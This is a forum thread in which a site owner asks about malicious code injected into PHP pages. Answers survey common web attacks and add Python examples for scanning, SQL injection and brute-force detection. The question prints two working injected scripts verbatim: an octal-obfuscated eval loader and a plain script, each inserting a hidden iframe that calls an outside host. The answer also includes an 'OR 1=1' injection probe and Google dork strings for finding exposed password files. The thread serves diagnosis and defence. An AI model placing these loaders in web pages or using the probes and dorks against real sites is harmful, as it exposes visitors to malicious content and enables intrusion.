@Deb1703797

Site got hacked while many / all security leaks have been removed

Posted in: #Javascript #Php #Security #Virus

I've got a website with this code appended to my PHP document:

<? #8f4d8e #
echo " <script type="text/javascript" language="javascript" > //ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0146,0172,0146,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0146,0172,0146,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0144,0141,0171,0172,055,0151,0147,0151,056,0164,0153,057,0167,0160,055,0143,0157,0156,0164,0145,0156,0164,057,0143,0157,0165,0156,0164,0145,0162,056,0160,0150,0160,047,073,015,012,040,040,040,040,0146,0172,0146,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0146,0172,0146,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0146,0172,0146,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0146,0172,0146,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0146,0172,0146,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0146,0172,0146,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0146,0172,0146,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,
0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0146,0172,0146,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0146,0172,0146,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0146,0172,0146,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+479!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}</script>";

#/8f4d8e#
?>


I removed all my PHP treatment (receiving POST and GET, then dealing with it); the only references to GET or POST are secured using htmlspecialchars and stripslashes.

I removed as many external JavaScript tools as possible.

I thought my website was minified to the maximum for minimum security leaks, but it seems it didn't do its job, as mentioned with the code up here...

Previously I had the following code injection (you'll see that the two injections are not the same...):

/*68c8c7*/
//(function () { var id = '8'; var wtxmw09 = document.createElement('iframe'); wtxmw09.src = 'http://www.cittadinolibero.it/clk.php'; wtxmw09.style.position = 'absolute'; wtxmw09.style.border = '1'; wtxmw09.style.height = '31px'; wtxmw09.style.width = '42px'; wtxmw09.style.left = '500px'; wtxmw09.style.top = '100px'; if (!document.getElementById('wtxmw')) { document.write('<style>body{overflow-x:hidden;}</style>'); document.write('<div id='wtxmw' style="position:absolute; width:80%; height:100%;" ></div>'); document.getElementById('wtxmw').appendChild(wtxmw09); }})();
/*/68c8c7*/


Also, how could I scan all my code for security leaks I wouldn't have thought about?
I tried RIPS, but with level 1 tainting, I had no message...

What are the several ways a hacker could use to hack a website? How?

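As an added example (mine, not code from the question or from any tool the poster names), here is a small Python scanner for the two injection styles visible in this question: a PHP block fenced by `#xxxxxx# ... #/xxxxxx#` comment markers and a JavaScript block fenced by `/*xxxxxx*/ ... /*/xxxxxx*/`. It also decodes the octal `new Array(...)` character list that the loader feeds to `String.fromCharCode`, so the hidden script can be read in plain text during clean-up instead of being run. The infected file it scans is constructed here (the hidden script and the `malicious.example` host are placeholders, not the real payload), and the marker and obfuscation regexes are an assumption generalised from the two samples on the page.

```python
import re
import tempfile
from pathlib import Path

# Signatures of the two injection styles quoted in the question: a PHP block
# wrapped in "#xxxxxx# ... #/xxxxxx#" markers and a JavaScript block wrapped in
# "/*xxxxxx*/ ... /*/xxxxxx*/" markers (six hex digits each). Generalised from
# those two samples, so treat the patterns as an assumption, not a standard.
MARKER_PATTERNS = [
    re.compile(r"<\?(?:php)?\s*#(?P<id>[0-9a-f]{6})\s*#.*?#/(?P=id)#\s*\?>", re.S),
    re.compile(r"/\*(?P<id>[0-9a-f]{6})\*/.*?/\*/(?P=id)\*/", re.S),
]

# Obfuscation tells seen in the injected loader: String.fromCharCode reached
# indirectly, an eval alias, a long octal array, and an iframe being created.
OBFUSCATION_HINTS = [
    re.compile(r"String\s*;\s*\w+\s*=\s*[\"']fromCharCode[\"']"),
    re.compile(r"\beval\b"),
    re.compile(r"new Array\((?:\s*0[0-7]+\s*,){20,}"),
    re.compile(r"createElement\(['\"]iframe['\"]\)"),
]

OCTAL_ARRAY = re.compile(r"new Array\(([0-7\s,]+)\)")


def find_injections(source: str) -> list:
    """Return (marker_id, line_number) for every marker-wrapped block."""
    hits = []
    for pattern in MARKER_PATTERNS:
        for m in pattern.finditer(source):
            hits.append((m.group("id"), source.count("\n", 0, m.start()) + 1))
    return hits


def obfuscation_score(text: str) -> int:
    """Number of obfuscation tells present (0 means none were seen)."""
    return sum(1 for pattern in OBFUSCATION_HINTS if pattern.search(text))


def decode_octal_array(source: str) -> str:
    """Turn 'new Array(0146,0165,...)' octal char codes back into the script
    they spell, so the hidden payload can be read instead of executed."""
    m = OCTAL_ARRAY.search(source)
    if not m:
        return ""
    tokens = re.split(r"[\s,]+", m.group(1).strip())
    return "".join(chr(int(t, 8)) for t in tokens if t)


def scan_file(path: Path) -> dict:
    """Scan one PHP file: markers found, obfuscation score (over the source plus
    the decoded array) and the decoded payload text."""
    source = path.read_text(errors="replace")
    decoded = decode_octal_array(source)
    return {
        "file": path.name,
        "markers": find_injections(source),
        "score": obfuscation_score(source + "\n" + decoded),
        "decoded": decoded,
    }


def scan_tree(root: Path) -> list:
    """Walk a document root; keep files with markers or 2+ obfuscation tells."""
    reports = (scan_file(p) for p in sorted(root.rglob("*.php")))
    return [r for r in reports if r["markers"] or r["score"] >= 2]


# Constructed infected sample, NOT the real payload: the hidden script and the
# host are placeholders, encoded the same way the quoted loader encodes its own.
HIDDEN_SCRIPT = ("var fzf = document.createElement('iframe');"
                 "fzf.src = 'http://malicious.example/counter.php';"
                 "fzf.style.width = '1px';document.body.appendChild(fzf);")
INFECTED_PHP = (
    "<?php echo 'hello'; ?>\n"
    "<? #8f4d8e #\n"
    "echo \"<script>ff=String;fff='fromCharCode';ff=ff[fff];v='eval';"
    "f=new Array(" + ",".join("0%o" % c for c in HIDDEN_SCRIPT.encode()) + ");"
    "s='';for(i=0;i<f.length;i++)s+=ff(f[i]);window[v](s)</script>\";\n"
    "#/8f4d8e#\n"
    "?>\n"
)


def demo() -> list:
    """Write the infected sample plus a clean file to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text(INFECTED_PHP)
        (root / "clean.php").write_text(
            "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>\n")
        return scan_tree(root)


if __name__ == "__main__":
    for report in demo():
        print(report["file"], report["markers"], "score", report["score"])
        print("  decoded:", report["decoded"])
```

Pointed at a real document root (`scan_tree(Path("/var/www"))`), the report lists every file carrying the markers together with the decoded iframe target, which is what you need both to clean the files and to know what the visitors were being sent to. Because the markers are only what this particular campaign used, the obfuscation score is the more general signal: a clean site rarely has `eval` next to a long octal array.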

@Nimeshi995

Your question is extremely broad because it's a complete guessing game without reviewing your logs, setup and hardware.

But to answer your question as you've asked it, hackers can gain entry to websites normally using these commonly known methods.

SQL Injections

This most likely accounts for the most common of hacks: an SQL injection on the database to return a string, or enter a string, to gain access. Most often, sites that are hacked by SQL injections are out-of-date content management systems or plugins that have access at the SQL level.

An example of SQL injection is entering `OR 1=1` into a username login form; some sites return strings that can then be used to further the attack.

SQL injections are often run on:

Input Forms, Search Boxes, Logins, etc.
URLs in Browser
Malicious Injection Files

You should research ways of preventing SQL injections, as well as looking at Dork Cheat Sheets.

Keyloggers

Keyloggers can be one of the most forgotten things when checking a website; there are plenty of viruses on the net, and most often they come packed with keygens and other cracks for expensive games and applications.

Cross Site Scripting (XSS)

XSS or Cross Site Scripting is the other major vulnerability that hackers tend to go after, particularly harder, large sites such as Gmail, Hotmail and so on. This requires a lot more effort than SQL injections, but hackers find it more rewarding. XSS prevention is pretty tricky too, but worth researching if you're sick and tired of being hacked, or if you just want to prevent XSS hacks.

Authorization Bypass

Authorization Bypass generally involves weak sites that are run on the same hosting, so access is gained to a weaker site in order to obtain access to the harder site. Many universities' and government-run sites are often hacked this way. There is a nice PDF about Authorization Bypass written by Michael Dalton at Stanford.

Google Hacking

Often Google will spider things that you don't want it to spider and this can leave undesirable results in Google search, example:

inurl:passlist.txt
inurl:passwd.txt
"login: *" "password= *" filetype:xls

You can check out the latest Google Dorks and Cheat Sheets here and read more about Google hacking on Wikipedia.

Password Cracking

This is less common due to the effort involved, but it does have some effect on weaker sites. Basically, bots can brute-force a website that uses weaker passwords up to harder passwords, but harder passwords take a long time. SSH servers are a great example of this: if you don't use key auth, they will run a brute-force password cracker on it for days, weeks, months until it finds the correct logins.

One of the best preventions for this is to block the IP for X mins using mod_security and fail2ban on your Linux box, but that doesn't rule it out if they are cycling their IPs with an infinite supply of proxies.

Poor Permissions

While poor permissions are less common for actually gaining access to the server (unless the files are writable by the public in order to upload a script), strong permissions can be a great way of preventing additional files from being touched. Even with SQL injections, if you CHMOD your files correctly, say on .htaccess and the config file, they will be unable to change them without knowing your cPanel or FTP password. I strongly recommend you research CHMOD; it's an awesome way of stopping hackers getting in, and is also a last line of defense once they're in, and can make things a lot easier to recover from.

More

I'm sure there are hundreds more ways they can gain access, and that is one of the reasons I added this as a community wiki.

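An added example (mine, not from the answer) that demonstrates the SQL Injections and Cross Site Scripting sections above in Python against an in-memory SQLite table constructed for the purpose. It shows the `OR 1=1` probe the answer mentions succeeding against a concatenated query, still succeeding after the input is HTML-escaped (the `html.escape` call stands in for PHP's `htmlspecialchars`, which the question relies on), and failing once the query is parameterized; the last function shows where HTML escaping does belong. The usernames and passwords are made up.

```python
import html
import sqlite3

PAYLOAD = "' OR 1=1 --"   # the classic probe the answer refers to ("OR 1=1")


def make_db() -> sqlite3.Connection:
    """Constructed users table. Plaintext passwords keep the demo short; a real
    site stores salted hashes and compares them in code, not in SQL."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "battery staple")])
    return conn


def login_vulnerable(conn, username: str, password: str) -> list:
    """The anti-pattern: request values pasted into the SQL text. A quote in
    the input closes the string literal and the rest becomes SQL."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return [row[0] for row in conn.execute(sql)]


def login_html_escaped(conn, username: str, password: str) -> list:
    """Same query after html.escape, the equivalent of PHP's htmlspecialchars
    (quote=False mirrors its pre-8.1 default of leaving single quotes alone).
    HTML escaping is output encoding for the page; it does nothing for SQL."""
    return login_vulnerable(conn, html.escape(username, quote=False),
                            html.escape(password, quote=False))


def login_parameterized(conn, username: str, password: str) -> list:
    """The fix: placeholders. The driver sends the values separately from the
    statement, so input is only ever compared, never parsed as SQL."""
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password))
    return [row[0] for row in rows]


def render_greeting(username: str) -> str:
    """Where html.escape does belong: any request value echoed into HTML,
    which is the XSS case the answer describes."""
    return "<p>Welcome, %s</p>" % html.escape(username)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable    :", login_vulnerable(db, PAYLOAD, "x"))
    print("html-escaped  :", login_html_escaped(db, PAYLOAD, "x"))
    print("parameterized :", login_parameterized(db, PAYLOAD, "x"))
    print(render_greeting("<script>alert(1)</script>"))
```

The two defences are not interchangeable: parameters protect the SQL statement, escaping protects the HTML page, and a site that does only one of them (as the question's `htmlspecialchars` plus string-built queries would) is still open on the other side. In PHP the parameterized form is a PDO prepared statement with bound values.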
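An added example (not part of the answer) of the fail2ban-style check the Password Cracking section describes, written in Python over a constructed `/var/log/auth.log` excerpt: count sshd `Failed password` lines per source IP in a sliding window and flag the IP once the count reaches the threshold. The log lines, host name and addresses are made up (documentation IP ranges), and the threshold of 5 failures in 10 minutes is an assumption that happens to match fail2ban's stock `maxretry`/`findtime`.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# sshd failure lines as syslog writes them to auth.log. The syslog timestamp
# carries no year, so the year is supplied separately.
FAILED = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?\S+ from (?P<ip>[\d.]+) port \d+"
)


def parse_syslog_time(ts: str, year: int) -> datetime:
    """Parse 'Mar 12 10:00:01' into a datetime for the given year."""
    return datetime.strptime("%d %s" % (year, ts), "%Y %b %d %H:%M:%S")


def find_bans(lines, max_failures=5, window=timedelta(minutes=10), year=2012):
    """Sliding-window count of failures per source IP, the way a fail2ban sshd
    jail works (maxretry within findtime). Returns {ip: time the ban fired}."""
    recent = defaultdict(deque)
    banned = {}
    for line in lines:
        m = FAILED.match(line)
        if not m:
            continue                      # accepted logins, other daemons, etc.
        ip, when = m.group("ip"), parse_syslog_time(m.group("ts"), year)
        hits = recent[ip]
        hits.append(when)
        while when - hits[0] > window:    # drop failures older than the window
            hits.popleft()
        if len(hits) >= max_failures and ip not in banned:
            banned[ip] = when
    return banned


# Constructed log excerpt: a slow trickle from 192.0.2.9 (never 5 within 10
# minutes), a burst from 203.0.113.5, and one typo followed by a key login.
AUTH_LOG = """\
Mar 12 09:00:00 web1 sshd[2100]: Failed password for root from 192.0.2.9 port 3000 ssh2
Mar 12 09:15:00 web1 sshd[2101]: Failed password for root from 192.0.2.9 port 3001 ssh2
Mar 12 09:30:00 web1 sshd[2102]: Failed password for root from 192.0.2.9 port 3002 ssh2
Mar 12 09:45:00 web1 sshd[2103]: Failed password for root from 192.0.2.9 port 3003 ssh2
Mar 12 10:00:00 web1 sshd[2104]: Failed password for root from 192.0.2.9 port 3004 ssh2
Mar 12 10:00:01 web1 sshd[2201]: Failed password for root from 203.0.113.5 port 40122 ssh2
Mar 12 10:00:03 web1 sshd[2201]: Failed password for root from 203.0.113.5 port 40122 ssh2
Mar 12 10:00:05 web1 sshd[2203]: Failed password for invalid user admin from 203.0.113.5 port 40130 ssh2
Mar 12 10:00:07 web1 sshd[2203]: Failed password for invalid user admin from 203.0.113.5 port 40130 ssh2
Mar 12 10:00:09 web1 sshd[2205]: Failed password for root from 203.0.113.5 port 40140 ssh2
Mar 12 10:00:11 web1 sshd[2205]: Failed password for root from 203.0.113.5 port 40140 ssh2
Mar 12 10:01:00 web1 sshd[2210]: Failed password for deb from 198.51.100.7 port 50000 ssh2
Mar 12 10:01:30 web1 sshd[2210]: Accepted publickey for deb from 198.51.100.7 port 50000 ssh2
Mar 12 10:15:00 web1 sshd[2105]: Failed password for root from 192.0.2.9 port 3005 ssh2
"""

if __name__ == "__main__":
    for ip, when in find_bans(AUTH_LOG.splitlines()).items():
        print("ban", ip, "at", when.isoformat())
```

The slow source is the answer's caveat in miniature: an attacker spreading attempts across time or across many proxy addresses never trips a per-IP window, which is why key-only SSH authentication is the control that actually closes the door, with the rate limit as a noise reducer on top.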